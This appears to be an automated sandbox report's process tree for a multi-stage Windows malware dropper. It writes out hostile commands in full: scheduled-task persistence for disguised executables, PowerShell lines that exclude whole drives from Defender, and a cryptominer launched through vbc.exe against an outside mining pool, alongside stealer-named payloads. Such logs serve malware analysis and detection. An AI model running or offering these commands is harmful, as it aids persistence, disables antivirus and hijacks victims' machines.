C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "PresentationFontCache" /sc ONLOGON /tr "'C:\Users\All Users\Favorites\PresentationFontCache.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:904

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "PresentationFontCacheP" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Favorites\PresentationFontCache.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:616

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\DriverHostCrtNet\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2276

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\DriverHostCrtNet\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3044

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\DriverHostCrtNet\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1772

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\Windows\security\templates\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:544

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\security\templates\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1248

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\Windows\security\templates\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2312

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:1596

C:\Program Files (x86)\Gsoymaq.exe
"C:\Program Files (x86)\Gsoymaq.exe"
1⤵
PID:2124

C:\Program Files (x86)\Gsoymaq.exe
"C:\Program Files (x86)\Gsoymaq.exe" Win7
2⤵
PID:2612

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4384

C:\Windows\system32\taskeng.exe
taskeng.exe {ABD8C27E-2277-4AC7-BE77-94BC9C2041C8} S-1-5-21-3308111660-3636268597-2291490419-1000:JUBFGPHD\Admin:Interactive:[1]
1⤵
PID:3224

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
2⤵
PID:3972

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
PID:2572

C:\Users\Admin\AppData\Local\Temp\Files\Atqumy.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Atqumy.exe"
2⤵
PID:1408

C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"
2⤵
PID:3460

C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"
3⤵
PID:4932

C:\Users\Admin\AppData\Local\Temp\Files\Setup11.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Setup11.exe"
2⤵
PID:4744

C:\Users\Admin\AppData\Local\Temp\Files\gold1201001.exe
"C:\Users\Admin\AppData\Local\Temp\Files\gold1201001.exe"
2⤵
PID:4736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4736 -s 608
3⤵
- Program crash
PID:2968

C:\Users\Admin\AppData\Local\Temp\Files\net.exe
"C:\Users\Admin\AppData\Local\Temp\Files\net.exe"
2⤵
PID:2952

C:\Users\Admin\AppData\Local\Temp\Files\legend1234ff.exe
"C:\Users\Admin\AppData\Local\Temp\Files\legend1234ff.exe"
2⤵
PID:844

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:4428

C:\Users\Admin\AppData\Local\Temp\Files\btcgood.exe
"C:\Users\Admin\AppData\Local\Temp\Files\btcgood.exe"
2⤵
PID:3328

C:\Users\Admin\AppData\Local\Temp\Files\for.exe
"C:\Users\Admin\AppData\Local\Temp\Files\for.exe"
2⤵
PID:4344

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:2276

C:\Users\Admin\AppData\Roaming\configurationValue\STAR.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\STAR.exe"
4⤵
PID:4892

C:\Users\Admin\AppData\Roaming\configurationValue\bott.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\bott.exe"
4⤵
PID:2292

C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Cpp_1_3_1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Cpp_1_3_1.exe"
2⤵
PID:4140

C:\Users\Admin\AppData\Local\Temp\Files\pixxxxx.exe
"C:\Users\Admin\AppData\Local\Temp\Files\pixxxxx.exe"
2⤵
PID:552

C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe"
2⤵
PID:4032

C:\Users\Admin\AppData\Local\Temp\Files\teamviewer.exe
"C:\Users\Admin\AppData\Local\Temp\Files\teamviewer.exe"
2⤵
PID:3244

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1712

C:\Users\Admin\AppData\Local\Temp\Files\abtc8mhlbehqil.exe
"C:\Users\Admin\AppData\Local\Temp\Files\abtc8mhlbehqil.exe"
2⤵
- Executes dropped EXE
PID:2796

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
3⤵
PID:2856

C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1656

C:\Users\Admin\AppData\Local\Temp\Files\fund.exe
"C:\Users\Admin\AppData\Local\Temp\Files\fund.exe"
2⤵
- Executes dropped EXE
PID:440

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\DriverHostCrtNet\jO3lbUgUCuGG0nAZHcS.vbe"
3⤵
PID:2260

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\DriverHostCrtNet\ELvGRxvU.bat" "
4⤵
- Loads dropped DLL
PID:1548

C:\DriverHostCrtNet\comSvc.exe
"C:\DriverHostCrtNet\comSvc.exe"
5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1836

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
6⤵
PID:2588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
6⤵
PID:2812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
6⤵
PID:1360

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
6⤵
PID:2972

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
6⤵
PID:2748

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2936

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriverHostCrtNet/'
6⤵
PID:2744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1624

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\E2FgvhS1mJ.bat"
6⤵
PID:1496

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
7⤵
PID:1944

C:\Windows\security\templates\sppsvc.exe
"C:\Windows\security\templates\sppsvc.exe"
7⤵
PID:2436

C:\Users\Admin\AppData\Local\Temp\Files\dota.exe
"C:\Users\Admin\AppData\Local\Temp\Files\dota.exe"
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:1844

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:2256

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:2888

C:\Users\Admin\AppData\Local\Temp\heidiOVQBua2vEjYu\ZV7eVaE21uid5jxWl7NM.exe
"C:\Users\Admin\AppData\Local\Temp\heidiOVQBua2vEjYu\ZV7eVaE21uid5jxWl7NM.exe"
3⤵
PID:1948

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://www.linkedin.com/login
4⤵
PID:656

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:656 CREDAT:275457 /prefetch:2
5⤵
PID:2188

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/
4⤵
PID:1092

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1092 CREDAT:275457 /prefetch:2
5⤵
PID:1816

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/video
4⤵
PID:2540

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2540 CREDAT:275457 /prefetch:2
5⤵
PID:1080

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://www.youtube.com/
4⤵
PID:528

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:528 CREDAT:275457 /prefetch:2
5⤵
PID:2500

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com
4⤵
PID:2008

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef5ec9758,0x7fef5ec9768,0x7fef5ec9778
5⤵
PID:3036

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 --field-trial-handle=1284,i,2975976223994029221,6408962943625330871,131072 /prefetch:2
5⤵
PID:3484

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1596 --field-trial-handle=1284,i,2975976223994029221,6408962943625330871,131072 /prefetch:8
5⤵
PID:3292

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1540 --field-trial-handle=1284,i,2975976223994029221,6408962943625330871,131072 /prefetch:8
5⤵
PID:2028

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2320 --field-trial-handle=1284,i,2975976223994029221,6408962943625330871,131072 /prefetch:1
5⤵
PID:4464

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2336 --field-trial-handle=1284,i,2975976223994029221,6408962943625330871,131072 /prefetch:1
5⤵
PID:4256

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2484 --field-trial-handle=1284,i,2975976223994029221,6408962943625330871,131072 /prefetch:1
5⤵
PID:4888

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2580 --field-trial-handle=1284,i,2975976223994029221,6408962943625330871,131072 /prefetch:1
5⤵
PID:4668

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video
4⤵
PID:620

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xbc,0xc0,0xc4,0x90,0xc8,0x7fef5ec9758,0x7fef5ec9768,0x7fef5ec9778
5⤵
PID:2232

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1120 --field-trial-handle=1316,i,10943236253123169351,10087494818679386714,131072 /prefetch:2
5⤵
PID:3948

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1448 --field-trial-handle=1316,i,10943236253123169351,10087494818679386714,131072 /prefetch:8
5⤵
PID:4148

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
4⤵
PID:2560

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xbc,0xc0,0xc4,0x90,0xc8,0x7fef5ec9758,0x7fef5ec9768,0x7fef5ec9778
5⤵
PID:2916

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1104 --field-trial-handle=1300,i,9862607139499187944,4938552534353982555,131072 /prefetch:2
5⤵
PID:4344

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1496 --field-trial-handle=1300,i,9862607139499187944,4938552534353982555,131072 /prefetch:8
5⤵
PID:4488

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
4⤵
PID:1512

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
5⤵
PID:2428

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2428.0.1847585710\2049542454" -parentBuildID 20221007134813 -prefsHandle 1248 -prefMapHandle 1240 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9c979145-b38c-4835-9fcf-7c4d86a96016} 2428 "\\.\pipe\gecko-crash-server-pipe.2428" 1360 104d6558 gpu
6⤵
PID:3796

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2428.1.1633118680\1700515620" -parentBuildID 20221007134813 -prefsHandle 1536 -prefMapHandle 1532 -prefsLen 21610 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {023dace7-f17f-4516-b66c-675a99289ade} 2428 "\\.\pipe\gecko-crash-server-pipe.2428" 1564 d71b58 socket
6⤵
PID:3440

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2428.2.818679831\49724775" -childID 1 -isForBrowser -prefsHandle 2064 -prefMapHandle 2060 -prefsLen 21648 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f591a21-7f07-4fbf-8455-fe78988a963f} 2428 "\\.\pipe\gecko-crash-server-pipe.2428" 2076 10460458 tab
6⤵
PID:3712

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2428.3.1650749980\958252343" -childID 2 -isForBrowser -prefsHandle 2756 -prefMapHandle 2752 -prefsLen 26111 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e50f22aa-b99f-4c9a-8c58-c1aabdee50fa} 2428 "\\.\pipe\gecko-crash-server-pipe.2428" 2804 d60958 tab
6⤵
PID:4752

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
4⤵
PID:1764

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
5⤵
PID:2240

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2240.0.2086310896\2117576311" -parentBuildID 20221007134813 -prefsHandle 1028 -prefMapHandle 1016 -prefsLen 17556 -prefMapSize 230321 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8537a397-08d6-48d7-890f-4b4973c3890b} 2240 "\\.\pipe\gecko-crash-server-pipe.2240" 1180 e9d8658 gpu
6⤵
PID:3488

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2240.1.1350491070\1084910472" -parentBuildID 20221007134813 -prefsHandle 1292 -prefMapHandle 1288 -prefsLen 17601 -prefMapSize 230321 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6432b577-25f3-4fde-a3d8-fd6e438a3760} 2240 "\\.\pipe\gecko-crash-server-pipe.2240" 1304 e844e58 socket
6⤵
PID:4332

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
4⤵
PID:1408

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
5⤵
PID:788

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="788.0.1722132172\1106579958" -parentBuildID 20221007134813 -prefsHandle 1012 -prefMapHandle 1004 -prefsLen 17556 -prefMapSize 230321 -appDir "C:\Program Files\Mozilla Firefox\browser" - {88735c0b-038e-4057-ba7f-b55a6804ef10} 788 "\\.\pipe\gecko-crash-server-pipe.788" 1140 41f9358 gpu
6⤵
PID:4188

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="788.1.26584450\639402377" -parentBuildID 20221007134813 -prefsHandle 1272 -prefMapHandle 1268 -prefsLen 17601 -prefMapSize 230321 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ff9bc7d9-8822-42e2-bc49-bb7026461406} 788 "\\.\pipe\gecko-crash-server-pipe.788" 1284 4044e58 socket
6⤵
PID:4372

C:\Users\Admin\AppData\Local\Temp\heidiOVQBua2vEjYu\CFWE7ef5N6KgEFkrT1pq.exe
"C:\Users\Admin\AppData\Local\Temp\heidiOVQBua2vEjYu\CFWE7ef5N6KgEFkrT1pq.exe"
3⤵
PID:2848

C:\Users\Admin\AppData\Local\Temp\heidiOVQBua2vEjYu\6ZUll2_LeOc2WKnc4iPl.exe
"C:\Users\Admin\AppData\Local\Temp\heidiOVQBua2vEjYu\6ZUll2_LeOc2WKnc4iPl.exe"
3⤵
PID:2016

C:\Users\Admin\AppData\Local\Temp\heidiOVQBua2vEjYu\4EgnvQHn0HnHYLk_7ulm.exe
"C:\Users\Admin\AppData\Local\Temp\heidiOVQBua2vEjYu\4EgnvQHn0HnHYLk_7ulm.exe"
3⤵
PID:1172

C:\Users\Admin\AppData\Local\Temp\heidiOVQBua2vEjYu\gGPt1P95s_8ZCeejzLSy.exe
"C:\Users\Admin\AppData\Local\Temp\heidiOVQBua2vEjYu\gGPt1P95s_8ZCeejzLSy.exe"
3⤵
PID:1684

C:\Users\Admin\AppData\Local\Temp\Files\PresentationFontCache.exe
"C:\Users\Admin\AppData\Local\Temp\Files\PresentationFontCache.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1252

C:\Users\Admin\AppData\Local\Temp\Files\PresentationFontCache.exe
"C:\Users\Admin\AppData\Local\Temp\Files\PresentationFontCache.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2080

C:\Users\Admin\AppData\Local\Temp\Files\rty47.exe
"C:\Users\Admin\AppData\Local\Temp\Files\rty47.exe"
2⤵
- Executes dropped EXE
PID:2996

C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
2⤵
PID:1044

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp8009.tmp.bat""
3⤵
PID:2248

C:\Windows\system32\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:2584

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
4⤵
PID:976

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
5⤵
PID:1048

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
6⤵
- Creates scheduled task(s)
PID:1248

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
5⤵
PID:2672

C:\Users\Admin\AppData\Local\Temp\Files\Recorder.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Recorder.exe"
2⤵
PID:2300

C:\Users\Admin\AppData\Local\Temp\Files\lve5.exe
"C:\Users\Admin\AppData\Local\Temp\Files\lve5.exe"
2⤵
PID:1096

C:\Users\Admin\AppData\Local\Temp\Files\rty45.exe
"C:\Users\Admin\AppData\Local\Temp\Files\rty45.exe"
2⤵
PID:1356

C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
"C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"
2⤵
PID:1776

C:\Users\Admin\AppData\Local\Temp\Files\TrueCrypt_NKwtUN.exe
"C:\Users\Admin\AppData\Local\Temp\Files\TrueCrypt_NKwtUN.exe"
2⤵
PID:1072

C:\Users\Admin\AppData\Local\Temp\Files\TJeAjWEEeH.exe
"C:\Users\Admin\AppData\Local\Temp\Files\TJeAjWEEeH.exe"
2⤵
PID:3644

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
3⤵
PID:2132

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "CNSWA" /tr "C:\ProgramData\Chrome\CNSWA.exe"
3⤵
PID:2160

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "CNSWA" /tr "C:\ProgramData\Chrome\CNSWA.exe"
4⤵
- Creates scheduled task(s)
PID:4440

C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup7.exe
"C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup7.exe"
2⤵
PID:1668

